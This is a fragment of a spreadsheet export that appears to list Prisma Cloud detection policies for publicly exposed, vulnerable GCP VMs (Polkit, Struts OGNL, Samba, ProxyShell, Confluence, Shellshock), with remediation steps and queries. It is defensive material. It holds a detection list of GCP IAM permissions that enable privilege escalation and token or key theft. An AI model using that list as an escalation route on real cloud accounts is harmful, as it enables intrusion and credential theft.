          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2021-4034].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Polkit [CVE-2021-4034] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X2807"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CVE-2021-4034
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-4034</t>
        </is>
      </c>
      <c r="Y2807" t="inlineStr"/>
      <c r="Z2807" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-4034'))</t>
        </is>
      </c>
      <c r="AA2807" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2807" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2807" t="inlineStr"/>
      <c r="AD2807" t="b">
        <v>1</v>
      </c>
      <c r="AE2807" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2807" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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7" t="inlineStr">
        <is>
          <t>20bc55ce-2539-47fd-a7ac-086773e12469</t>
        </is>
      </c>
      <c r="AI2807" t="inlineStr">
        <is>
          <t>ed1a37c1-adc9-480e-b3de-e96d55196e80</t>
        </is>
      </c>
      <c r="AJ2807" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2807" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2808">
      <c r="A2808" t="inlineStr"/>
      <c r="B2808" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2808" s="2" t="inlineStr"/>
      <c r="D2808" t="inlineStr"/>
      <c r="E2808" t="inlineStr"/>
      <c r="F2808" t="inlineStr"/>
      <c r="G2808" t="b">
        <v>1</v>
      </c>
      <c r="H28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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2808" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2808" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Apache Struts OGNL Evaluation, Multiple CVEs]</t>
        </is>
      </c>
      <c r="L2808" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2808" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2808" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2808" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2808" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2808" t="inlineStr"/>
      <c r="R2808" t="inlineStr"/>
      <c r="S2808" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2808" t="b">
        <v>0</v>
      </c>
      <c r="U2808" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2808" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2808" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [OGNL Evaluation Injection, Multiple CVEs]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Apache Struts software prone to OGNL Evaluation makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the Apache Struts OGNL Evaluation Injection vulnerabilities reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X2808"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CVE-2020-17530
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
    https://nvd.nist.gov/vuln/detail/CVE-2020-17530
    https://nvd.nist.gov/vuln/detail/CVE-2019-0230
    https://nvd.nist.gov/vuln/detail/CVE-2018-11776
    https://nvd.nist.gov/vuln/detail/CVE-2017-5638
    https://nvd.nist.gov/vuln/detail/CVE-2016-4461
    https://nvd.nist.gov/vuln/detail/CVE-2016-0785
    https://nvd.nist.gov/vuln/detail/CVE-2013-2135
    https://nvd.nist.gov/vuln/detail/CVE-2013-2134
    https://nvd.nist.gov/vuln/detail/CVE-2022-26134
    https://nvd.nist.gov/vuln/detail/CVE-2016-3081
    https://nvd.nist.gov/vuln/detail/CVE-2017-12611</t>
        </is>
      </c>
      <c r="Y2808" t="inlineStr"/>
      <c r="Z2808" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2020-17530, CVE-2019-0230, CVE-2018-11776, CVE-2017-5638, CVE-2016-4461, CVE-2016-0785, CVE-2013-2135, CVE-2013-2134, CVE-2022-26134, CVE-2016-3081, CVE-2017-12611 - OGNL Evaluation Injection) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2020-17530', 'CVE-2019-0230', 'CVE-2018-11776', 'CVE-2017-5638', 'CVE-2016-4461', 'CVE-2016-0785', 'CVE-2013-2135', 'CVE-2013-2134', 'CVE-2022-26134', 'CVE-2016-3081', 'CVE-2017-12611'))</t>
        </is>
      </c>
      <c r="AA2808" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2808" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:39</t>
        </is>
      </c>
      <c r="AC2808" t="inlineStr"/>
      <c r="AD2808" t="b">
        <v>1</v>
      </c>
      <c r="AE2808" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2808" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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8" t="inlineStr">
        <is>
          <t>d9d842c7-f768-4c66-8620-30a03738fabe</t>
        </is>
      </c>
      <c r="AI2808" t="inlineStr">
        <is>
          <t>d6e66f2c-a58b-4c65-8d79-e56615b476a9</t>
        </is>
      </c>
      <c r="AJ2808" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2808" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2809">
      <c r="A2809" t="inlineStr"/>
      <c r="B2809" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2809" s="2" t="inlineStr"/>
      <c r="D2809" t="n">
        <v>3</v>
      </c>
      <c r="E2809" t="n">
        <v>0</v>
      </c>
      <c r="F2809" t="n">
        <v>0</v>
      </c>
      <c r="G2809" t="b">
        <v>1</v>
      </c>
      <c r="H28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09" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2809" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2809" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (Samba, CVE-2021-44142)</t>
        </is>
      </c>
      <c r="L2809" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2809" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2809" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2809" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2809" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2809" t="inlineStr"/>
      <c r="R2809" t="inlineStr"/>
      <c r="S2809" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2809" t="b">
        <v>0</v>
      </c>
      <c r="U2809" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2809" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2809" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2021-44142).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Samba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Samba (CVE-2021-44142) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2809"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CVE-2021-44142
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-44142</t>
        </is>
      </c>
      <c r="Y2809" t="inlineStr"/>
      <c r="Z2809" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-44142'))</t>
        </is>
      </c>
      <c r="AA2809" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2809" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:19</t>
        </is>
      </c>
      <c r="AC2809" t="inlineStr"/>
      <c r="AD2809" t="b">
        <v>1</v>
      </c>
      <c r="AE2809" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2809" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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09" t="inlineStr">
        <is>
          <t>1d654e43-4f55-41dd-8930-a575bda3f162</t>
        </is>
      </c>
      <c r="AI2809" t="inlineStr">
        <is>
          <t>86969add-0f20-49aa-bdb2-21c78e95e829</t>
        </is>
      </c>
      <c r="AJ2809" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2809" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2810">
      <c r="A2810" t="inlineStr"/>
      <c r="B2810" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2810" s="2" t="inlineStr"/>
      <c r="D2810" t="n">
        <v>175</v>
      </c>
      <c r="E2810" t="n">
        <v>0</v>
      </c>
      <c r="F2810" t="n">
        <v>0</v>
      </c>
      <c r="G2810" t="b">
        <v>1</v>
      </c>
      <c r="H28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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2810" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2810" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed and vulnerable GCP VM instance with Compute Engine default service account assigned</t>
        </is>
      </c>
      <c r="L2810" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2810" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2810" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2810" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2810" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2810" t="inlineStr"/>
      <c r="R2810" t="inlineStr"/>
      <c r="S2810" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2810" t="b">
        <v>0</v>
      </c>
      <c r="U2810" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2810" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2810" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have default service account attached.
Publicly exposed vulnerable VM instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The Compute Engine default service account is automatically created in a GCP project when Compute Engine API is enabled and granted the IAM basic Editor role. This service account is attached to all VM instances created unless specified otherwise. Compute Engine default service account on the instance further helps the attackers to escalate their privileges, move laterally or perform other unauthorized actions in the cloud account. 
Immediate attention is required to review role assignments and grant only the least privileges required. Remove unwanted roles assigned to the VM instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X281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[MISCONFIGURATION]
Log in to GCP Console
2. Navigate to 'Compute Engine' and click on 'VM instances'
3. Search for the alerted instance and click on the instance name
4. To make a change first we have to stop the instance; click on 'STOP' from the top menu
5. Click on 'EDIT' and Go to section 'Service account' 
6. From the dropdown select a non-default service account 
7. Click on 'Save'
8. Click on 'START/RESUME' from the top menu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10" t="inlineStr"/>
      <c r="Z2810" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP VM instance configured with default service account') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2810" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2810" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2810" t="inlineStr"/>
      <c r="AD2810" t="b">
        <v>1</v>
      </c>
      <c r="AE2810" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2810" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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0" t="inlineStr">
        <is>
          <t>e7e0f238-f379-4a5d-9ca8-50170af61776</t>
        </is>
      </c>
      <c r="AI2810" t="inlineStr">
        <is>
          <t>564663db-f7c9-424b-bc1d-c79103a4ece0</t>
        </is>
      </c>
      <c r="AJ2810" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2810" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2811">
      <c r="A2811" t="inlineStr"/>
      <c r="B2811" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2811" s="2" t="inlineStr"/>
      <c r="D2811" t="inlineStr"/>
      <c r="E2811" t="inlineStr"/>
      <c r="F2811" t="inlineStr"/>
      <c r="G2811" t="b">
        <v>1</v>
      </c>
      <c r="H28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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2811" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2811" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Microsoft ProxyShell, CVE-2021-34473]</t>
        </is>
      </c>
      <c r="L2811" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2811" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2811" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2811" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2811" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2811" t="inlineStr"/>
      <c r="R2811" t="inlineStr"/>
      <c r="S2811" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2811" t="b">
        <v>0</v>
      </c>
      <c r="U2811" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2811" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2811" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [Microsoft ProxyShell, CVE-2021-34473]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Microsoft software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Microsoft ProxyShell [CVE-2021-34473] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X2811"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CVE-2021-34473
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-34473</t>
        </is>
      </c>
      <c r="Y2811" t="inlineStr"/>
      <c r="Z2811" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-34473 - ProxyShell) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-34473'))</t>
        </is>
      </c>
      <c r="AA2811" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2811" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:39</t>
        </is>
      </c>
      <c r="AC2811" t="inlineStr"/>
      <c r="AD2811" t="b">
        <v>1</v>
      </c>
      <c r="AE2811" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2811" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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1" t="inlineStr">
        <is>
          <t>751aad16-070e-493d-991c-46cb5c1f6438</t>
        </is>
      </c>
      <c r="AI2811" t="inlineStr">
        <is>
          <t>507231fc-0eba-4201-820e-ab1179b178fc</t>
        </is>
      </c>
      <c r="AJ2811" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2811" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2812">
      <c r="A2812" t="inlineStr"/>
      <c r="B2812" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2812" s="2" t="inlineStr"/>
      <c r="D2812" t="inlineStr"/>
      <c r="E2812" t="inlineStr"/>
      <c r="F2812" t="inlineStr"/>
      <c r="G2812" t="b">
        <v>1</v>
      </c>
      <c r="H28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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2812" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2812" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability (CVE-2023-50164, Apache Struts)</t>
        </is>
      </c>
      <c r="L2812" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2812" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2812" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2812" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2812" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2812" t="inlineStr"/>
      <c r="R2812" t="inlineStr"/>
      <c r="S2812" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2812" t="b">
        <v>0</v>
      </c>
      <c r="U2812" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2812" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2812" t="inlineStr">
        <is>
          <t>This policy identifies attempts to exploit a known vulnerability (CVE-2023-50164) in applications running on GCP VM resources. The presence of CVE-2023-50164 in the application indicates a critical security risk that could allow attackers to perform directory traversal attacks, leading to unauthorized access to system files and performing arbitary code execution.
Detecting attempts to exploit this vulnerability underscores the urgency of assessing and securing affected applications to prevent successful attacks. The exploitation of CVE-2023-50164 could lead to significant security incidents, including unauthorized access to sensitive data and system compromise.
The fact that this policy not only detects the presence of the vulnerability but also actively monitors for exploit attempts enhances the security posture by enabling rapid response measures. It highlights the importance of maintaining up-to-date security patches and monitoring traffic for malicious patterns indicative of exploit attempts.
Immediate action is required to remediate the CVE-2023-50164 vulnerability on affected GCP VM instances. This includes applying security patches, reviewing access controls, and conducting thorough audits to prevent unauthorized access. Taking swift measures to address this vulnerability will help protect against data exposure and maintain the trust and confidence of stakeholders.</t>
        </is>
      </c>
      <c r="X2812" t="inlineStr">
        <is>
          <t>[Vulnerability]
1. Identify and access the reported resource affected by CVE-2023-50164
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
https://nvd.nist.gov/vuln/detail/CVE-2023-50164
[Exploit Attempt]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6.Set the protection effect in the created WAAS rule to "Prevent".</t>
        </is>
      </c>
      <c r="Y2812" t="inlineStr"/>
      <c r="Z2812" t="inlineStr">
        <is>
          <t>asset WHERE asset.type = 'gcloud-compute-instances-list' and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2023-50164 - Apache Struts Directory Traversal) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2023-50164'))</t>
        </is>
      </c>
      <c r="AA2812" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2812" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:28</t>
        </is>
      </c>
      <c r="AC2812" t="inlineStr"/>
      <c r="AD2812" t="b">
        <v>1</v>
      </c>
      <c r="AE2812" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2812" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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2" t="inlineStr">
        <is>
          <t>cbb23f4a-2dd7-44b1-83c8-d62003cf727c</t>
        </is>
      </c>
      <c r="AI2812" t="inlineStr">
        <is>
          <t>0b859077-c5dc-42ba-ab36-caf7c8054164</t>
        </is>
      </c>
      <c r="AJ2812" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2812" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2813">
      <c r="A2813" t="inlineStr"/>
      <c r="B2813" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2813" s="2" t="inlineStr"/>
      <c r="D2813" t="inlineStr"/>
      <c r="E2813" t="inlineStr"/>
      <c r="F2813" t="inlineStr"/>
      <c r="G2813" t="b">
        <v>1</v>
      </c>
      <c r="H28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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2813" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2813" t="inlineStr">
        <is>
          <t>Authentication bypass (BAC) exploitation attempt on GCP VM with known exploitable vulnerability [Confluence, CVE-2022-26138]</t>
        </is>
      </c>
      <c r="L2813" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2813" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2813" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2813" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2813" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2813" t="inlineStr"/>
      <c r="R2813" t="inlineStr"/>
      <c r="S2813" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2813" t="b">
        <v>0</v>
      </c>
      <c r="U2813" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2813" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2813" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [Confluence, CVE-2022-26138]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Confluence software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Confluence authentication bypass [CVE-2022-26138] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X2813"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CVE-2022-26138
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-26138</t>
        </is>
      </c>
      <c r="Y2813" t="inlineStr"/>
      <c r="Z2813" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-26138 - Confluence authentication bypass) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-26138'))</t>
        </is>
      </c>
      <c r="AA2813" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2813" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:33</t>
        </is>
      </c>
      <c r="AC2813" t="inlineStr"/>
      <c r="AD2813" t="b">
        <v>1</v>
      </c>
      <c r="AE2813" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2813" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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3" t="inlineStr">
        <is>
          <t>dd2aa660-2d4a-47fb-abe7-6ee528d1e6dd</t>
        </is>
      </c>
      <c r="AI2813" t="inlineStr">
        <is>
          <t>b52e2c14-416d-43f1-b0aa-624293107748</t>
        </is>
      </c>
      <c r="AJ2813" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2813" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2814">
      <c r="A2814" t="inlineStr"/>
      <c r="B2814" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2814" s="2" t="inlineStr"/>
      <c r="D2814" t="inlineStr"/>
      <c r="E2814" t="inlineStr"/>
      <c r="F2814" t="inlineStr"/>
      <c r="G2814" t="b">
        <v>1</v>
      </c>
      <c r="H28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14" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2814" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2814" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to Shellshock payload detected on traffic targetting a vulnerable GCP VM instance with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2814" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2814" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2814" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2814" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2814" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2814" t="inlineStr"/>
      <c r="R2814" t="inlineStr"/>
      <c r="S2814" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2814" t="b">
        <v>0</v>
      </c>
      <c r="U2814" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2814" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2814" t="inlineStr">
        <is>
          <t>This policy identifies vulnerable GCP VM instances with Shellshock payload detected in the traffic and having permissions that could potentially lead to privilege escalation.
Shellshock vulnerability allows attackers to execute arbitrary code on a vulnerable system by exploiting how Bash processes environment variables. When combined with elevated virtual machine permissions and Shellshock vulnerability payload in the traffic, attackers can escalate privileges, gain control over resources, and execute malicious actions within the environment.
This policy checks for the following risky permissions:
'accessapproval.requests.approve','accessapproval.requests.dismiss','accessapproval.settings.delete','accessapproval.settings.update','accesscontextmanager.accessLevels.create','accesscontextmanager.accessLevels.delete','accesscontextmanager.accessLevels.replaceAll','accesscontextmanager.accessLevels.update','accesscontextmanager.accessPolicies.create','accesscontextmanager.accessPolicies.delete','accesscontextmanager.accessPolicies.setIamPolicy','accesscontextmanager.accessPolicies.update','accesscontextmanager.gcpUserAccessBindings.create','accesscontextmanager.gcpUserAccessBindings.delete','accesscontextmanager.gcpUserAccessBindings.update','accesscontextmanager.policies.create','accesscontextmanager.policies.delete','accesscontextmanager.policies.setIamPolicy','accesscontextmanager.policies.update','iam.roles.create','iam.roles.delete','iam.roles.undelete', 'iam.roles.update','iam.serviceAccounts.getAccessToken','iam.serviceAccountKeys.create','iam.serviceAccountKeys.delete','iam.serviceAccounts.create','iam.serviceAccounts.delete','iam.serviceAccounts.disable','iam.serviceAccounts.enable','iam.serviceAccounts.setIamPolicy','iam.serviceAccounts.undelete','iam.serviceAccounts.update','iam.serviceAccounts.implicitDelegation','iam.serviceAccounts.signBlob','iam.serviceAccounts.signJwt','iam.serviceAccounts.actAs','compute.backendServices.setIamPolicy','compute.disks.removeResourcePolicies','compute.disks.setIamPolicy','compute.firewallPolicies.setIamPolicy','compute.globalOperations.setIamPolicy','compute.images.setIamPolicy','compute.instanceTemplates.setIamPolicy','compute.instances.removeResourcePolicies','compute.instances.setIamPolicy','compute.instances.setServiceAccount','compute.machineImages.setIamPolicy','compute.maintenancePolicies.setIamPolicy','compute.snapshots.setIamPolicy'
Immediate attention is required to review the VM traffic, add the WAAS rule to prevent this activity, remediate critical and high vulnerabilities, and remove unwanted permissions assigned to the VM instance.</t>
        </is>
      </c>
      <c r="X281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14" t="inlineStr"/>
      <c r="Z2814" t="inlineStr">
        <is>
